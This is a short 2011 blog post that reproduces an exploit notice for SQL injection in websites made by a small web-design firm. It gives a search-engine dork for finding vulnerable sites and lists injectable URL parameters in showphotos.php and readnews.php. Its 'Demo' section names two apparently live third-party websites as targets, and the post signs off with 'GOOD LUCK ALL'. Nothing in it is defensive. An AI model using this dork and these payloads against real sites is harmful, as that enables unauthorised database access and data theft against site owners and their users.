Monday, July 11, 2011

Alderney Web => SQL injection vulnerability exploit 

=====================================================================
# Title: Alderney Web=>SQL injection vulnerability
# Date:13/6/11
# Author: Sideswipe
# Home:www.alboraaq.com 
# Category: Web apps
# Dork: intext:"Website designed and hosted by Alderney Web & IT Services"
# Tested On : Xp and windows 7
=====================================================================

[-] Exploit:~
    
      #http://www.[localhost].com/showphotos.php?id=1'
      #http://www.[localhost].com/showphotos.php?id=(sql)

     #http://www.[localhost].com/readnews.php?id=6'
     #http://www.[localhost].com/readnews.php?id=(sql)

[-] Demo:~

     #http://www.longisbay.com/showphotos.php?id=2'
    #http://www.alderneyjournal.com/readnews.php?id=1104'
   

(^_^)GOOD LUCK ALL(^_^)
Posted by at 12:17 AM
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)